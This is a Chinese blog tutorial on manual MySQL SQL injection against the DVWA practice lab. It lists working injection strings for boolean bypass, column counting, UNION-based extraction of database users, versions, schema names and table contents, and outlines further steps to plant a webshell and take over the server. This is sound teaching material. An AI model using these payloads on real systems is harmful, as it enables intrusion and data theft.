`

SQL注入之DVWA平台测试mysql注入

 
阅读更多

今天主要针对mysql常用注入语句进行测试。

测试环境与工具:

测试平台:DVWA,下载地址:http://www.2cto.com/soft/201303/38043.html,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.。

渗透工具burpsuite-1.4.07:下载地址:http://www.2cto.com/soft/201211/35515.html

    首先我们介绍下DVWA和Burpsuite,DVWA这是一个php+mysql平台构建的预置web常见漏洞的渗透练习平台。能够帮助web应用安全研究人员很好了解web漏洞。Burpsuite是一款功能强大的web渗透测试工具。

    SQL注入漏洞在OWASP TOP 10威胁中,一直排名第一,安全威胁可见一斑。SQL注入渗透测试过程中,针对不同的数据库平台,注入语句选择也不同,本篇笔者主要测试mysql注入的常用语句以及渗透思路。

 

登录访问DVWA,默认用户名:admin密码:password.

登录之后,将dvwa的安全级别调成low,low代表安全级别最低,存在较容易测试的漏洞。

1、找到SQl Injection 选项,测试是否存在注入点,这里用户交互的地方为表单,这也是常见的SQL注入漏洞存在的地方。正常测试,输入1,可以得到如下结果


当将输入变为“'”时,页面提示错误“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1”,结果如图。看到这个结果,我们可以欣慰的知道,这个表单存在着注入漏洞。

2、尝试遍历数据库表,由于用户输入的值为ID,因此我们习惯判断这里的注入类型为数字型,因此尝试输入:1 or 1=1 ,看能否把数据库表中的内容遍历出来。可是结果如下,并没有显示出所有信息

于是猜测,是否后台应用程序将此值看做了字符型,于是输入:1'or'1'='1,结果,遍历出了数据库中的所有内容,如果是重要数据库表,可能这个信息已经对于攻击者,有了足够意义:如图

1'or'1'='1

 

3、测试查询信息列数。利用语句order by num 

这里我们输入 " 1'order by 1 -- " 结果页面正常显示,注意-- 后面有空格。继续测试," 1'order by 2 -- "," 1'order by 3 -- ",当输入3是,页面报错。页面错误信息如下,Unknown column '3' in 'order clause',由此我们判断查询结果值为2列。

1'order by 1 --

1'order by 3 --

 


  Unknown column '3' in 'order clause'

4、通过得到连接数据库账户信息、数据库名称、数据库版本信息。利用user(),及database(),version()等三个内置函数。

这里尝试注入 “1' and 1=2 union select 1,2 -- ”结果如下

1' and 1=2 union select 1,2 -- 

从而得出First name处显示结果为查询结果第一列的值,surname处显示结果为查询结果第二列的值,利用内置函数user(),及database(),version()注入得出连接数据库用户以及数据库名称:

1' and 1=2 union select user(),database()  -- 

连接数据库的用户Ϊroot@localhost,数据库名称为dvwa,进一步利用函数version(),尝试得到版本信息,“1' and 1=2 union select version(),database()  -- ”便得到了版本信息,

1' and 1=2 union select version(),database()  -- 

5、获得操作系统信息。


1'and 1=2 union select 1,@@global.version_compile_os from mysql.user --

6、测试连接数据库权限:


 1' and ord(mid(user(),1,1))=114 -- 

7、查询mysql数据库,所有数据库名字:这里利用mysql默认的数据库infromation_scehma,该数据库存储了Mysql所有数据库和表的信息。


1' and 1=2 union select 1,schema_name from information_schema.schemata -- 

8、猜解dvwa数据库中的表名。利用1‘ and exists(select * from 表名),此处表名猜解可以通过brupsuit挂字典猜解。这里测试的结果,表名为users,burpsuite如何自动注入,在稍后文章进一步介绍。这里猜解表名,在真实渗透测试环境中,攻击者往往关心存储管理员用户与密码信息的表。

1' and exists(select * from users) --

 

9、猜解字段名:1' and exists(select 表名 from users) -- ,这里测试的字段名有first_name,last_name


1' and exists(select first_name from users) -- 

ID: 1' and exists(select last_name from users) -- 

10、爆出数据库中字段的内容 1' and 1=2 union select first_name,last_name from users -- ,这里其实如果是存放管理员账户的表,那么用户名,密码信息字段就可以爆出来了。

以上是笔者根据dvwa平台sql injection漏洞对mysql常用语句所做的测试。这里我们可以大致总结渗透的一般思路:

1、寻找注入点,可以通过web扫描工具实现

2、通过注入点,尝试获得关于连接数据库用户名、数据库名称、连接数据库用户权限、操作系统信息、数据库版本等相关信息。

3、猜解关键数据库表及其重要字段与内容(常见如存放管理员账户的表名、字段名等信息)

4、可以通过获得的用户信息,寻找后台登录。

5、利用后台或了解的进一步信息,上传webshell或向数据库写入一句话木马,以进一步提权,直到拿到服务器权限。

今天笔者只在dvwa平台现有环境下,简单测试了mysql几个常用注入语句:

1' order by 2 --   /*用来猜解查询信息的列数

1' and 1=2 union select user(),database(),-- 

1' and 1=2 union select user(),version(), -- /*利用user(),database(),version()函数获得数据库信息

1'and 1=2 union select 1,@@global.version_compile_os from mysql.user -- /*获得操作系统信息1' and ord(mid(user(),1,1))=114 --  /*测试连接数据库用户权限

1' and 1=2 union select 1,schema_name from information_schema.schemata -- /*爆出所有数据库名称1' and exists(select * from users) -- /*猜解表名

1' and exists(select first_name from users) -- /猜解字段名

1' and 1=2 union select first_name,last_name from users -- /*猜解字段内容

 

关于mysql注入测试,就简单介绍到这里,如有错误,欢迎指正。关于brupsuite如何自动注入,将在其他篇章介绍

 

分享到:
评论

相关推荐

    网络渗透测试平台_DVWA_201807

    DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。

    网络渗透测试平台DVWA-1.9

    DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。

    Web应用安全:pangolin用法介绍.pptx

    准备SQL注入测试环境 目录 2 Pangolin 进行SQL注入测试演示 准备测试环境 打开phpStudy并开启Apache网站服务和MySQL数据库服务 1.开启phpStudy环境 在web网站打开DVWA站点,然后将站点安全等级调整为“low” 打开...

    网络渗透测试 XSS和SQL注入

    了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具: Beef;...

    Dvwa最新版本2022可用,下载到phpstudy,www目录下就可使用

    DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。 【许可】DVWA是一个免费软件,在遵守自由软件基金会发布的GNU通用公共许可的前提下,你可以重新发布它和/或修改它。许可可以是版本3,...

    DVWA靶场环境---新手入坑

    DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。

    DVWA_Tool.rar

    Web应用程序(DVWA)是一个很容易受到攻击的PHP / MySQL Web应用程序。其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,帮助Web开发人员更好地了解保护Web应用程序的过程,并帮助学生和教师了解受控...

    DVWA.zip(新手入门练习)

    DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。

    DVWA.rar+xampp工具

    DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。这节实验主要使用WebCruiser工具对网站的登录页...

    php防止sql注入简单分析

    防止Sql注入的方法有很多,这里要说的其实就是漏洞演练平台Dvwa里的一种方式 直接看high级别的就可以了 $id = $_GET['id']; $id = stripslashes($id); $id = mysql_real_escape_string($id); if (is_numeric($id)){...

    houkc.github.io:HouKC的博客

    Web安全学习笔记(最近更新)Web笔记(一)SQL注入之MySQLWeb笔记(二)SQL注入之AccessWeb笔记(三)SQL注入之MssqlWeb笔记(四)SQL注入之OracleWeb笔记(五)SQL注入之PostgreSQLWeb笔记(六)SQL注入之其他注入...

    Web应用安全:Sqlmap用法介绍(实验).docx

    使用Sqlmap工具对DVWA站点进行SQL注入实验; 实验内容与步骤 1、安装Sqlmap。 1.1、由于Sqlmap是免费的开源软件,我们可以直接在官网上下载/,点击download .zip 选择合适的路径即可下载到本机。 1.2、将下载到的....

    Web应用安全:Sqlmap用法介绍.pptx

    2. Sqlmap SQL注入演示 搭建phpStudy phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该...

    phpStudy20161103.zip

    DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。

Global site tag (gtag.js) - Google Analytics